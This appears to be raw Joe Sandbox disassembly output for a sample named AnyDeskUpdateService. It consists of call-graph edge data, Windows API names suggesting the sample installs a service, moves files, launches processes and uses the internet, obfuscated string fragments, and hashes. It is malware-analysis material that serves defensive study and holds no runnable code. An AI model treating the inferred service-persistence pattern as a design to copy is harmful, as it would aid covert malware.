7ff71ddab1d8 __free_lconv_mon 5 API calls 24028->24032 24029->24028 24030->23958 24030->23959 24030->23960 24030->23961 24032->24030 24034 7ff71dda6af4 6 API calls 24033->24034 24035 7ff71ddb9f19 24034->24035 24035->24023 24036 7ff71ddb9fb5 CreateProcessW 24035->24036 24037 7ff71dda6178 TranslateName 23 API calls 24035->24037 24036->24023 24038 7ff71ddb9f3d 24037->24038 24041 7ff71ddb9f47 24038->24041 24065 7ff71ddab4e8 GetProcAddress __crtLCMapStringW 24038->24065 24040 7ff71dda6af4 6 API calls 24042 7ff71ddb9faa 24040->24042 24041->24040 24042->24023 24042->24036 24043->23984 24044->23972 24045->23997 24046->24004 24047->24007 24049 7ff71ddae938 24048->24049 24052 7ff71ddaee08 24049->24052 24051 7ff71ddae941 24051->24015 24053 7ff71ddaee4f 24052->24053 24054 7ff71ddaee81 24053->24054 24055 7ff71ddaee93 24053->24055 24056 7ff71dda4bc4 _set_fmode 5 API calls 24054->24056 24057 7ff71ddab160 _Getctype 5 API calls 24055->24057 24058 7ff71ddaee86 24056->24058 24059 7ff71ddaeeb4 24057->24059 24058->24051 24060 7ff71dda4bc4 _set_fmode 5 API 
calls 24059->24060 24062 7ff71ddaeec1 _fread_nolock 24059->24062 24060->24062 24061 7ff71ddab1d8 __free_lconv_mon 5 API calls 24061->24058 24062->24061 24063->24020 24064->24033 24065->24041 24086 7ff71dda7e70 FlsSetValue FlsSetValue FlsSetValue FlsSetValue HeapFree 24195 7ff71dd97f70 28 API calls 2 library calls 23227 7ff71dd9d275 23239 7ff71dda99d8 23227->23239 23229 7ff71dd9d27a 23230 7ff71dd9d2a1 GetModuleHandleW 23229->23230 23231 7ff71dd9d2eb 23229->23231 23230->23231 23237 7ff71dd9d2ae 23230->23237 23232 7ff71dd9d178 FlsSetValue FlsSetValue FlsSetValue FlsSetValue HeapFree 23231->23232 23233 7ff71dd9d327 23232->23233 23234 7ff71dd9d32e 23233->23234 23235 7ff71dd9d344 6 API calls 23233->23235 23236 7ff71dd9d340 23235->23236 23237->23231 23238 7ff71dd9d39c GetModuleHandleExW GetProcAddress 23237->23238 23238->23231 23244 7ff71ddaab80 23 API calls 4 library calls 23239->23244 23243 7ff71dda99e1 __crtLCMapStringW 23245 7ff71dda675c 23 API calls BuildCatchObjectHelperInternal 23243->23245 23244->23243 24162 7ff71ddae468 28 API calls 3 library calls 24163 7ff71dd95040 RtlLeaveCriticalSection RtlEnterCriticalSection GetProcAddress ctype 24196 7ff71dd8ef40 42 API calls 2 library calls 24118 7ff71ddb6940 25 API calls 4 library calls 23246 7ff71dd9e337 41 API calls _fread_nolock 24198 7ff71dd81340 23 API calls __std_exception_copy 24087 7ff71ddbba50 36 API calls 24165 7ff71ddb7c50 GetProcessHeap 24166 7ff71dd97c4a 5 API calls BuildCatchObjectHelperInternal 24199 7ff71ddbeb4c RtlPcToFileHeader Concurrency::cancel_current_task 24200 7ff71dd9d720 6 API calls 2 library calls 24088 7ff71dd8e620 41 API calls 24121 7ff71dd8e920 32 API calls 4 library calls 24169 7ff71ddbc020 CloseHandle 24122 7ff71ddab120 6 API calls 24123 7ff71ddb4518 47 API calls 6 library calls 23247 7ff71dd97b1c 23271 7ff71dd97cf0 23247->23271 23250 7ff71dd97c73 23396 7ff71dd98430 4 API calls 2 library calls 23250->23396 23251 7ff71dd97b3d __scrt_acquire_startup_lock 23253 7ff71dd97c7d 23251->23253 23261 
7ff71dd97b5b _RTC_Initialize __scrt_release_startup_lock 23251->23261 23397 7ff71dd98430 4 API calls 2 library calls 23253->23397 23255 7ff71dd97b80 23256 7ff71dd97c88 BuildCatchObjectHelperInternal 23398 7ff71dd98324 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 23256->23398 23258 7ff71dd97ca9 23259 7ff71dd97c06 23277 7ff71dda787c 23259->23277 23261->23255 23261->23259 23393 7ff71dd9d440 23 API calls __GSHandlerCheck_EH 23261->23393 23263 7ff71dd97c0b 23283 7ff71dd82840 23263->23283 23267 7ff71dd97c2f 23267->23256 23268 7ff71dd97c33 23267->23268 23395 7ff71dd97e74 RtlDeleteCriticalSection 23268->23395 23270 7ff71dd97c46 23270->23255 23272 7ff71dd97cf8 23271->23272 23273 7ff71dd97d04 __scrt_dllmain_crt_thread_attach 23272->23273 23274 7ff71dd97b35 23273->23274 23275 7ff71dd97d11 23273->23275 23274->23250 23274->23251 23275->23274 23399 7ff71dd998f0 RtlDeleteCriticalSection __vcrt_uninitialize_ptd __vcrt_uninitialize_locks 23275->23399 23278 7ff71dda78a1 23277->23278 23279 7ff71dda788c 23277->23279 23278->23263 23279->23278 23400 7ff71dda730c 25 API calls __free_lconv_mon 23279->23400 23281 7ff71dda78aa 23281->23278 23401 7ff71dda76cc 6 API calls 3 library calls 23281->23401 23284 7ff71dd828c8 23283->23284 23402 7ff71dd8fe90 23284->23402 23286 7ff71dd828d7 23406 7ff71dda3510 23286->23406 23288 7ff71dd828ec 23289 7ff71dd8fe90 47 API calls 23288->23289 23290 7ff71dd8293a 23289->23290 23436 7ff71dd8fcd0 23290->23436 23292 7ff71dd82d5d 23293 7ff71dd82d6a GetFileAttributesW 23292->23293 23295 7ff71dd82d7d 23293->23295 23294 7ff71dd82ee5 23297 7ff71dd8fcd0 24 API calls 23294->23297 23295->23294 23448 7ff71dd8f530 23295->23448 23298 7ff71dd82f7d 23297->23298 23302 7ff71dd8fcd0 24 API calls 23298->23302 23299 7ff71dd82ec0 23494 7ff71dd8f410 23299->23494 23304 7ff71dd8303a 23302->23304 23305 7ff71dd8fcd0 24 API calls 23304->23305 23306 7ff71dd83737 23305->23306 23307 7ff71dd8fcd0 24 API calls 23306->23307 23308 7ff71dd83b2e 
23307->23308 23309 7ff71dd8fcd0 24 API calls 23308->23309 23310 7ff71dd83fb3 23309->23310 23313 7ff71dd8fcd0 24 API calls 23310->23313 23311 7ff71dd82db1 23311->23299 23476 7ff71dd920a0 23311->23476 23315 7ff71dd844de 23313->23315 23314 7ff71dd82eb1 23316 7ff71dd920a0 47 API calls 23314->23316 23317 7ff71dd8fcd0 24 API calls 23315->23317 23316->23299 23318 7ff71dd84acf 23317->23318 23319 7ff71dd84adc GetFileAttributesW 23318->23319 23320 7ff71dd84aea 23319->23320 23321 7ff71dd84af2 23319->23321 23320->23321 23322 7ff71dd8508e 23320->23322 23324 7ff71dd8fcd0 24 API calls 23321->23324 23323 7ff71dd8509a GetFileAttributesW 23322->23323 23325 7ff71dd850d3 23323->23325 23329 7ff71dd850a8 23323->23329 23327 7ff71dd8504d 23324->23327 23326 7ff71dd850df GetFileAttributesW 23325->23326 23328 7ff71dd8512d 23326->23328 23345 7ff71dd85135 23326->23345 23547 7ff71dd8cdf0 15 API calls 2 library calls 23327->23547 23330 7ff71dd85712 23328->23330 23328->23345 23329->23325 23331 7ff71dd850c7 MoveFileW 23329->23331 23335 7ff71dd85721 GetFileAttributesW 23330->23335 23331->23325 23333 7ff71dd85074 InternetCloseHandle 23548 7ff71dd8fc60 23333->23548 23336 7ff71dd8572f 23335->23336 23347 7ff71dd85737 23335->23347 23337 7ff71dd86d92 23336->23337 23336->23347 23338 7ff71dd8fcd0 24 API calls 23337->23338 23339 7ff71dd86e69 23338->23339 23340 7ff71dd86e76 lstrcmpiW 23339->23340 23341 7ff71dd86e87 23340->23341 23342 7ff71dd86e91 GetCurrentProcessId 23340->23342 23502 7ff71dd87a20 GetModuleFileNameW 23341->23502 23556 7ff71dd81500 24 API calls codecvt 23342->23556 23346 7ff71dd8fcd0 24 API calls 23345->23346 23348 7ff71dd856d2 23346->23348 23375 7ff71dd8fcd0 24 API calls 23347->23375 23549 7ff71dd8cdf0 15 API calls 2 library calls 23348->23549 23350 7ff71dd856f9 23550 7ff71dd8cf30 InternetCloseHandle 23350->23550 23352 7ff71dd856fe 23352->23330 23353 7ff71dd86e8c 23354 7ff71dd976f0 codecvt 4 API calls 23353->23354 23355 7ff71dd87954 23354->23355 23394 7ff71dd98580 GetModuleHandleW 
23355->23394 23356 7ff71dd86ea5 23357 7ff71dd8fcd0 24 API calls 23356->23357 23358 7ff71dd87047 23357->23358 23557 7ff71dd8fbd0 24 API calls ctype 23358->23557 23360 7ff71dd8705b 23361 7ff71dd870b2 ShellExecuteExW 23360->23361 23362 7ff71dd8730a StartServiceCtrlDispatcherW 23361->23362 23364 7ff71dd870d0 __vcrt_getptd_noinit 23361->23364 23363 7ff71dd8788d 23362->23363 23371 7ff71dd8733a 23362->23371 23363->23353 23558 7ff71dd923b0 47 API calls 2 library calls 23364->23558 23366 7ff71dd872e6 23559 7ff71dd8dbc0 47 API calls 5 library calls 23366->23559 23368 7ff71dd872f0 23560 7ff71dd923b0 47 API calls 2 library calls 23368->23560 23370 7ff71dd872fb 23370->23362 23372 7ff71dd8fcd0 24 API calls 23371->23372 23373 7ff71dd87878 23372->23373 23561 7ff71dd885f0 27 API calls 2 library calls 23373->23561 23376 7ff71dd868be 23375->23376 23551 7ff71dd8cdf0 15 API calls 2 library calls 23376->23551 23378 7ff71dd868e5 23552 7ff71dd8cf30 InternetCloseHandle 23378->23552 23380 7ff71dd868ea 23381 7ff71dd8fcd0 24 API calls 23380->23381 23382 7ff71dd86aab 23381->23382 23383 7ff71dd86b11 ShellExecuteExW 23382->23383 23384 7ff71dd86d5f WaitForSingleObject CloseHandle 23383->23384 23386 7ff71dd86b32 __vcrt_getptd_noinit 23383->23386 23385 7ff71dd86d85 23384->23385 23385->23337 23553 7ff71dd923b0 47 API calls 2 library calls 23386->23553 23388 7ff71dd86d3b 23554 7ff71dd8dbc0 47 API calls 5 library calls 23388->23554 23390 7ff71dd86d45 23555 7ff71dd923b0 47 API calls 2 library calls 23390->23555 23392 7ff71dd86d50 23392->23384 23393->23259 23394->23267 23395->23270 23396->23253 23397->23256 23398->23258 23399->23274 23400->23281 23401->23278 23403 7ff71dd8feb0 23402->23403 23403->23403 23404 7ff71dd929a0 47 API calls 23403->23404 23405 7ff71dd8febe 23404->23405 23405->23286 23562 7ff71ddae8fc 23406->23562 23409 7ff71dda3642 23410 7ff71dda3583 23415 7ff71dda4bc4 _set_fmode 5 API calls 23410->23415 23433 7ff71dda35d0 23410->23433 23411 7ff71dda3559 23412 7ff71dda3566 23411->23412 
23411->23433 23565 7ff71ddaf474 23412->23565 23414 7ff71ddab1d8 __free_lconv_mon 5 API calls 23417 7ff71dda3578 23414->23417 23418 7ff71dda35a8 23415->23418 23420 7ff71dd976f0 codecvt 4 API calls 23417->23420 23421 7ff71dda4bc4 _set_fmode 5 API calls 23418->23421 23419 7ff71ddab1d8 __free_lconv_mon 5 API calls 23419->23417 23422 7ff71dda3630 23420->23422 23423 7ff71dda35af 23421->23423 23422->23288 23424 7ff71dda35d4 23423->23424 23425 7ff71dda35cb 23423->23425 23427 7ff71dda4bc4 _set_fmode 5 API calls 23424->23427 23426 7ff71dda4bc4 _set_fmode 5 API calls 23425->23426 23426->23433 23428 7ff71dda35d9 23427->23428 23429 7ff71dda35f6 23428->23429 23430 7ff71dda4bc4 _set_fmode 5 API calls 23428->23430 23431 7ff71dda4bc4 _set_fmode 5 API calls 23429->23431 23432 7ff71dda35e3 23430->23432 23431->23433 23432->23429 23434 7ff71dda35e8 23432->23434 23433->23414 23435 7ff71ddab1d8 __free_lconv_mon 5 API calls 23434->23435 23435->23417 23439 7ff71dd8fd01 23436->23439 23437 7ff71dd8fe11 23637 7ff71dd814e0 24 API calls 23437->23637 23439->23437 23441 7ff71dd8fd29 ctype 23439->23441 23442 7ff71dd8fdc1 23439->23442 23443 7ff71dd8fd6d 23439->23443 23447 7ff71dd8fd82 23439->23447 23441->23292 23445 7ff71dd979bc std::_Facet_Register 24 API calls 23442->23445 23446 7ff71dd979bc std::_Facet_Register 24 API calls 23443->23446 23443->23447 23445->23441 23446->23447 23447->23441 23636 7ff71dd81440 24 API calls 2 library calls 23447->23636 23449 7ff71dd979bc std::_Facet_Register 24 API calls 23448->23449 23450 7ff71dd8f62a 23449->23450 23638 7ff71dd950dc 23450->23638 23453 7ff71dd91ef0 47 API calls 23454 7ff71dd8f657 23453->23454 23455 7ff71dd8f675 23454->23455 23459 7ff71dd8f8e8 23454->23459 23456 7ff71dd979bc std::_Facet_Register 24 API calls 23455->23456 23457 7ff71dd8f6f5 23456->23457 23458 7ff71dd950dc 28 API calls 23457->23458 23460 7ff71dd8f6ff 23458->23460 23462 7ff71dd82660 47 API calls 23459->23462 23647 7ff71dd96c78 23460->23647 23464 7ff71dd8f928 23462->23464 23466 
7ff71dd995e4 Concurrency::cancel_current_task RtlPcToFileHeader 23464->23466 23465 7ff71dd8f789 23655 7ff71dd9d8bc 23 API calls 2 library calls 23465->23655 23469 7ff71dd8f8b9 23466->23469 23468 7ff71dd8f7f7 _RTC_Initialize 23656 7ff71dd92740 43 API calls 5 library calls 23468->23656 23471 7ff71dd82660 47 API calls 23469->23471 23475 7ff71dd8f85c _RTC_Initialize 23469->23475 23472 7ff71dd8f97d 23471->23472 23473 7ff71dd995e4 Concurrency::cancel_current_task RtlPcToFileHeader 23472->23473 23474 7ff71dd8f98e 23473->23474 23475->23311 23477 7ff71dd920d0 _RTC_Initialize 23476->23477 23478 7ff71dd91c30 47 API calls 23477->23478 23482 7ff71dd92125 _RTC_Initialize 23477->23482 23478->23482 23479 7ff71dd92316 23484 7ff71dd82660 47 API calls 23479->23484 23480 7ff71dd922e2 _RTC_Initialize 23480->23314 23481 7ff71dd922d1 23481->23480 23847 7ff71dd91d70 47 API calls 2 library calls 23481->23847 23482->23479 23482->23481 23485 7ff71dd92358 23484->23485 23486 7ff71dd995e4 Concurrency::cancel_current_task RtlPcToFileHeader 23485->23486 23487 7ff71dd92369 23486->23487 23488 7ff71dd91ef0 47 API calls 23487->23488 23489 7ff71dd9238a 23488->23489 23490 7ff71dd943e0 47 API calls 23489->23490 23491 7ff71dd92395 23490->23491 23492 7ff71dd91c30 47 API calls 23491->23492 23493 7ff71dd9239d 23492->23493 23493->23314 23848 7ff71dd91220 23494->23848 23496 7ff71dd82ed8 23546 7ff71dd8f4b0 43 API calls 23496->23546 23497 7ff71dd8f422 23497->23496 23498 7ff71dd82660 47 API calls 23497->23498 23499 7ff71dd8f496 23498->23499 23500 7ff71dd995e4 Concurrency::cancel_current_task RtlPcToFileHeader 23499->23500 23501 7ff71dd8f4a7 23500->23501 23503 7ff71dd87c01 23502->23503 23504 7ff71dd87a6f 23502->23504 23505 7ff71dd8fcd0 24 API calls 23503->23505 23508 7ff71dd929a0 47 API calls 23504->23508 23506 7ff71dd87ce4 23505->23506 23865 7ff71dd81260 23506->23865 23510 7ff71dd87b98 __vcrt_getptd_noinit 23508->23510 23512 7ff71dd81150 41 API calls 23510->23512 23511 7ff71dd87e22 CreateServiceW 23515 
7ff71dd87f6b 23511->23515 23516 7ff71dd87e89 23511->23516 23514 7ff71dd87bbe 23512->23514 23513 7ff71dd87d24 23513->23513 23518 7ff71dd929a0 47 API calls 23513->23518 23519 7ff71dd87bfc 23514->23519 23532 7ff71dd880c9 23514->23532 23515->23515 23521 7ff71dd929a0 47 API calls 23515->23521 23516->23516 23522 7ff71dd929a0 47 API calls 23516->23522 23517 7ff71dd976f0 codecvt 4 API calls 23520 7ff71dd880ac 23517->23520 23523 7ff71dd87db9 __vcrt_getptd_noinit 23518->23523 23519->23517 23520->23353 23524 7ff71dd87ff9 23521->23524 23525 7ff71dd87ef8 __vcrt_getptd_noinit 23522->23525 23527 7ff71dd81150 41 API calls 23523->23527 23869 7ff71dd81150 23524->23869 23530 7ff71dd81150 41 API calls 23525->23530 23527->23514 23528 7ff71dd88013 23529 7ff71dd8804e CloseServiceHandle CloseServiceHandle 23528->23529 23528->23532 23529->23514 23531 7ff71dd87f1e CloseServiceHandle 23530->23531 23531->23514 23533 7ff71dd880e6 RegisterServiceCtrlHandlerW 23532->23533 23534 7ff71dd88407 SetServiceStatus CreateEventW 23533->23534 23535 7ff71dd88137 23533->23535 23536 7ff71dd8846f SetServiceStatus CreateThread 23534->23536 23537 7ff71dd884c8 __vcrt_getptd_noinit 23534->23537 23540 7ff71dd8fcd0 24 API calls 23535->23540 23536->23537 23544 7ff71dd883be 23536->23544 23538 7ff71dd884ce SetServiceStatus 23537->23538 23538->23544 23539 7ff71dd976f0 codecvt 4 API calls 23542 7ff71dd8850f 23539->23542 23541 7ff71dd883ab 23540->23541 23873 7ff71dd885f0 27 API calls 2 library calls 23541->23873 23542->23353 23544->23539 23545 7ff71dd88520 23544->23545 23546->23294 23547->23333 23548->23322 23549->23350 23550->23352 23551->23378 23552->23380 23553->23388 23554->23390 23555->23392 23556->23356 23557->23360 23558->23366 23559->23368 23560->23370 23561->23363 23579 7ff71ddae77c 23562->23579 23564 7ff71dda354b 23564->23409 23564->23410 23564->23411 23566 7ff71ddaf490 23565->23566 23567 7ff71ddaf49a 23565->23567 23596 7ff71ddaf3c8 24 API calls 5 library calls 23566->23596 23597 7ff71dda6178 23567->23597 23573 
7ff71ddaf4d2 23606 7ff71dda6af4 23573->23606 23575 7ff71ddaf52e 23577 7ff71dda356d 23575->23577 23578 7ff71ddab1d8 __free_lconv_mon 5 API calls 23575->23578 23577->23419 23578->23577 23582 7ff71ddae7a8 23579->23582 23580 7ff71ddae7b0 23581 7ff71dda4bc4 _set_fmode 5 API calls 23580->23581 23583 7ff71ddae7b5 23581->23583 23582->23580 23584 7ff71ddae7d3 23582->23584 23593 7ff71dda4a58 23 API calls _invalid_parameter_noinfo 23583->23593 23594 7ff71ddae870 41 API calls 23584->23594 23587 7ff71ddae7c1 23587->23564 23588 7ff71ddae7db 23588->23587 23589 7ff71ddae819 23588->23589 23590 7ff71ddae809 23588->23590 23595 7ff71dda9a04 23 API calls 2 library calls 23589->23595 23591 7ff71dda4bc4 _set_fmode 5 API calls 23590->23591 23591->23587 23593->23587 23594->23588 23595->23587 23596->23577 23598 7ff71dda619c 23597->23598 23604 7ff71dda6197 23597->23604 23598->23604 23628 7ff71ddaab80 23 API calls 4 library calls 23598->23628 23600 7ff71dda61b7 23629 7ff71ddacfc8 23 API calls _Getctype 23600->23629 23602 7ff71dda61da 23630 7ff71ddad034 23 API calls TranslateName 23602->23630 23604->23573 23605 7ff71ddab4e8 GetProcAddress __crtLCMapStringW 23604->23605 23605->23573 23607 7ff71dda6b42 23606->23607 23608 7ff71dda6b1e 23606->23608 23609 7ff71dda6b47 23607->23609 23610 7ff71dda6b9c 23607->23610 23612 7ff71ddab1d8 __free_lconv_mon 5 API calls 23608->23612 23614 7ff71dda6b2d 23608->23614 23613 7ff71dda6b5c 23609->23613 23609->23614 23615 7ff71ddab1d8 __free_lconv_mon 5 API calls 23609->23615 23635 7ff71ddb2d98 MultiByteToWideChar 23610->23635 23612->23614 23631 7ff71ddacf68 23613->23631 23614->23575 23627 7ff71ddaf3c8 24 API calls 5 library calls 23614->23627 23615->23613 23627->23575 23628->23600 23629->23602 23630->23604 23633 7ff71ddacf77 std::_Facet_Register _Getctype 23631->23633 23632 7ff71dda4bc4 _set_fmode 5 API calls 23634 7ff71ddacfb1 23632->23634 23633->23632 23633->23634 23634->23614 23636->23437 23639 7ff71dd94c5c std::_Lockit::_Lockit 2 API calls 23638->23639 23640 
7ff71dd950fe 23639->23640 23646 7ff71dd95121 ctype _RTC_Initialize 23640->23646 23657 7ff71dd952d4 24 API calls std::_Facet_Register 23640->23657 23642 7ff71dd94cd4 std::_Lockit::~_Lockit RtlLeaveCriticalSection 23644 7ff71dd8f634 23642->23644 23643 7ff71dd95116 23658 7ff71dd95304 24 API calls std::locale::_Setgloballocale 23643->23658 23644->23453 23646->23642 23648 7ff71dd96cbe 23647->23648 23654 7ff71dd8f77d 23648->23654 23659 7ff71dda5868 23648->23659 23652 7ff71dd96d0c 23652->23654 23679 7ff71dd9de30 23652->23679 23654->23465 23654->23469 23655->23468 23656->23475 23657->23643 23658->23646 23660 7ff71dda57ac 23659->23660 23661 7ff71dda57c9 23660->23661 23663 7ff71dda57f5 23660->23663 23662 7ff71dda4bc4 _set_fmode 5 API calls 23661->23662 23664 7ff71dda57ce 23662->23664 23665 7ff71dda5807 23663->23665 23666 7ff71dda57fa 23663->23666 23696 7ff71dda4a58 23 API calls _invalid_parameter_noinfo 23664->23696 23687 7ff71ddace08 23665->23687 23668 7ff71dda4bc4 _set_fmode 5 API calls 23666->23668 23670 7ff71dd96cf1 23668->23670 23670->23654 23678 7ff71dda4638 39 API calls _invalid_parameter_noinfo 23670->23678 23671 7ff71dda5811 23672 7ff71dda5828 23671->23672 23673 7ff71dda581b 23671->23673 23691 7ff71ddb1edc 23672->23691 23674 7ff71dda4bc4 _set_fmode 5 API calls 23673->23674 23674->23670 23676 7ff71dda583c 23697 7ff71dd9d910 RtlLeaveCriticalSection 23676->23697 23678->23652 23680 7ff71dd9de60 23679->23680 23833 7ff71dd9dd0c 23680->23833 23682 7ff71dd9de79 23683 7ff71dd9de9e 23682->23683 23843 7ff71dd9d5f4 23 API calls 3 library calls 23682->23843 23686 7ff71dd9deb3 23683->23686 23844 7ff71dd9d5f4 23 API calls 3 library calls 23683->23844 23686->23654 23688 7ff71ddace1f 23687->23688 23698 7ff71ddace7c 23688->23698 23690 7ff71ddace2a 23690->23671 23715 7ff71ddb1c18 23691->23715 23694 7ff71ddb1f36 23694->23676 23696->23670 23706 7ff71ddacead 23698->23706 23699 7ff71ddacf46 23699->23690 23700 7ff71ddacefc 23701 7ff71ddab160 _Getctype 5 API calls 23700->23701 23703 
7ff71ddacf09 23701->23703 23704 7ff71ddab1d8 __free_lconv_mon 5 API calls 23703->23704 23705 7ff71ddacf13 23704->23705 23705->23699 23713 7ff71ddab7d4 GetProcAddress __crtLCMapStringW __vcrt_InitializeCriticalSectionEx 23705->23713 23706->23699 23706->23700 23706->23706 23711 7ff71dd9d904 RtlEnterCriticalSection 23706->23711 23712 7ff71dd9d910 RtlLeaveCriticalSection 23706->23712 23708 7ff71ddacf33 23714 7ff71dd9d904 RtlEnterCriticalSection 23708->23714 23713->23708 23720 7ff71ddb1c42 23715->23720 23716 7ff71dda4bc4 _set_fmode 5 API calls 23717 7ff71ddb1ebb 23716->23717 23733 7ff71dda4a58 23 API calls _invalid_parameter_noinfo 23717->23733 23719 7ff71ddb1dfe 23719->23694 23727 7ff71ddbad34 23719->23727 23725 7ff71ddb1df5 23720->23725 23730 7ff71ddba4bc 23 API calls 3 library calls 23720->23730 23722 7ff71ddb1e56 23722->23725 23731 7ff71ddba4bc 23 API calls 3 library calls 23722->23731 23724 7ff71ddb1e77 23724->23725 23732 7ff71ddba4bc 23 API calls 3 library calls 23724->23732 23725->23716 23725->23719 23734 7ff71ddba608 23727->23734 23729 7ff71ddbad61 23729->23694 23730->23722 23731->23724 23732->23725 23733->23719 23735 7ff71ddba61f 23734->23735 23737 7ff71ddba63d 23734->23737 23736 7ff71dda4bc4 _set_fmode 5 API calls 23735->23736 23739 7ff71ddba624 23736->23739 23737->23735 23738 7ff71ddba659 23737->23738 23743 7ff71ddbac18 23738->23743 23754 7ff71dda4a58 23 API calls _invalid_parameter_noinfo 23739->23754 23742 7ff71ddba630 23742->23729 23744 7ff71dda6178 TranslateName 23 API calls 23743->23744 23745 7ff71ddbac6b 23744->23745 23750 7ff71ddbac7b 23745->23750 23798 7ff71ddab4e8 GetProcAddress __crtLCMapStringW 23745->23798 23747 7ff71dda6af4 6 API calls 23748 7ff71ddbacd3 23747->23748 23749 7ff71ddbacd7 23748->23749 23755 7ff71ddbad68 23748->23755 23752 7ff71ddbad14 23749->23752 23753 7ff71ddab1d8 __free_lconv_mon 5 API calls 23749->23753 23750->23747 23752->23742 23753->23752 23754->23742 23799 7ff71ddba94c 23755->23799 23757 7ff71ddbadaf 23758 7ff71ddbadf5 
                                                                                                      • Graph edge data (continued from the preceding function; omitted). Windows APIs referenced in this portion: CreateFileW, GetFileType, CloseHandle, RtlEnterCriticalSection, RtlLeaveCriticalSection, OpenSCManagerW; CRT internals: _fread_nolock, _set_fmode, __vcrt_getptd_noinit, _invalid_parameter_noinfo, _RTC_Initialize, codecvt

                                                                                                      Control-flow Graph

                                                                                                      • Graph entry: 7ff71dd82840 (edge data omitted). Windows APIs referenced: GetFileAttributesW, MoveFileW, InternetCloseHandle, ShellExecuteExW, WaitForSingleObject, CloseHandle, lstrcmpiW, GetCurrentProcessId, StartServiceCtrlDispatcherW
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Internet$Attributesstd::_$CloseHandleLockit$ErrorEventLast$ExecuteLockit::_Lockit::~_OpenReadRegisterShellSource$Concurrency::cancel_current_taskCreateCtrlCurrentDeregisterDispatcherFacet_MoveObjectProcessReportServiceSingleStartWaitWritelstrcmpi
                                                                                                      • String ID: $x'x$%x*x$&x>x$)nln$,x'x$-x?x$.x5x$0r!r$20240913$3x9x$4x<x$5x=x$:r>r$:xyx$AnyDeskUpdateService$GY!Y$H}wM$M$NYOY$Nr<r$Qx$x$enfn$h1w{$jnhn$jxWx$pH}wM$sncn$t$ux(x$vzv$$w$wnmn$xx~x$}Y>Y$}wM
                                                                                                      • API String ID: 2766441065-4267904903
                                                                                                      • Opcode ID: c718f0704d29a904090881f6a353c4df41576d63dd8bb5b8d9f832d7076f5b72
                                                                                                      • Instruction ID: 45397506b2542b497ff831494f8866c49df416c9cfeb3b15e7c6f10426e87ba4
                                                                                                      • Opcode Fuzzy Hash: c718f0704d29a904090881f6a353c4df41576d63dd8bb5b8d9f832d7076f5b72
                                                                                                      • Instruction Fuzzy Hash: E0936E1552C6D689E330AF71D8103FA7261EF58718F81003BD28C8BAA9FF3D9649DB65

                                                                                                      Control-flow Graph

                                                                                                      • Graph entry: 7ff71dd87a20 (edge data omitted). Windows APIs referenced: GetModuleFileNameW, OpenSCManagerW, CreateServiceW, CloseServiceHandle, RegisterServiceCtrlHandlerW, SetServiceStatus, CreateEventW, CreateThread
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Service$ErrorLastStatus$CloseCreateHandle$CtrlEventFileHandlerManagerModuleNameOpenRegisterThread
                                                                                                      • String ID: %s$%s (%d)$%s (%d)$%s (%d)$AnyDesk Update Service$AnyDeskUpdateService$AnyDeskUpdateService$pslk
                                                                                                      • API String ID: 4101962034-53298800
                                                                                                      • Opcode ID: 00848399103b6d949bbf2ad8a78e9ae82022c4cbc5f55f62c2c1f851970f7318
                                                                                                      • Instruction ID: 56602dd4475ae23148ff91bbf50fb94b35faab294628369486b938b662e7fc42
                                                                                                      • Opcode Fuzzy Hash: 00848399103b6d949bbf2ad8a78e9ae82022c4cbc5f55f62c2c1f851970f7318
                                                                                                      • Instruction Fuzzy Hash: 7862E422E1CA8989E700AF78D4012BDB3B1FF457A8F904237DA98566A5FF3CD149CB50

                                                                                                      Control-flow Graph

                                                                                                      • Graph entry: 7ff71ddbad68 (edge data omitted). Windows APIs referenced: CreateFileW, GetFileType, CloseHandle
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
